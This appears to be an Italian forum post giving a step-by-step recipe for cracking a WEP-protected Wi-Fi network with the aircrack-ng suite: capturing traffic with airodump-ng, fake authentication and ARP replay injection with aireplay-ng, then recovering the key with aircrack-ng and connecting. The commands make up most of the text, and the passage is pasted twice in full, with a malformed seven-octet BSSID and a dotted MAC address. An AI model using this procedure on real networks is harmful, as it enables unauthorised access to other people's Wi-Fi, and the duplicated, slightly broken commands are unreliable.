se fai le cose per bene una wep si cracka in 5 minuti contati.
inutile spoofare il MAC se hai il permesso(a meno che non ci sia filtro, ma da qunto letto non mi sembra)....quindi i passaggi sono
airodump-ng wlan0
#ti segni canale e bssid (per sempio c 1 bssid 00:00:00:00:00:00, segnati anche il tuo mac 11.11.11.11.11.11)
airodump-ng -c 1 -w wep --bssid 00:00:00:00:00:00 wlan0
aireplay-ng -1 0 -a 00:00:00:00:00:00 -h 11.11.11.11.11.11 wlan0
aireplay-ng -3 -b 00:00:00:00:00:00 -h 11.11.11.11.11.11 wlan0
#a questo punto aspetta di sniffare un pacchetto arp.....
#ci potrebbe mettere tanto, appena succede vedrai che inizierai ad inoltrare migliaia di pacchetti....
#non chiudere aireplay ed avvia aircrack...
aircrack-ng -b 00:00:00:00:00:00:00 wep-01.cap
dopo poco ti troveràuna stringa del tipo AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA
copiala senza punti e sei connesso.
inutile spoofare il MAC se hai il permesso(a meno che non ci sia filtro, ma da qunto letto non mi sembra)....quindi i passaggi sono
airodump-ng wlan0
#ti segni canale e bssid (per sempio c 1 bssid 00:00:00:00:00:00, segnati anche il tuo mac 11.11.11.11.11.11)
airodump-ng -c 1 -w wep --bssid 00:00:00:00:00:00 wlan0
aireplay-ng -1 0 -a 00:00:00:00:00:00 -h 11.11.11.11.11.11 wlan0
aireplay-ng -3 -b 00:00:00:00:00:00 -h 11.11.11.11.11.11 wlan0
#a questo punto aspetta di sniffare un pacchetto arp.....
#ci potrebbe mettere tanto, appena succede vedrai che inizierai ad inoltrare migliaia di pacchetti....
#non chiudere aireplay ed avvia aircrack...
aircrack-ng -b 00:00:00:00:00:00:00 wep-01.cap
dopo poco ti troveràuna stringa del tipo AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA
copiala senza punti e sei connesso.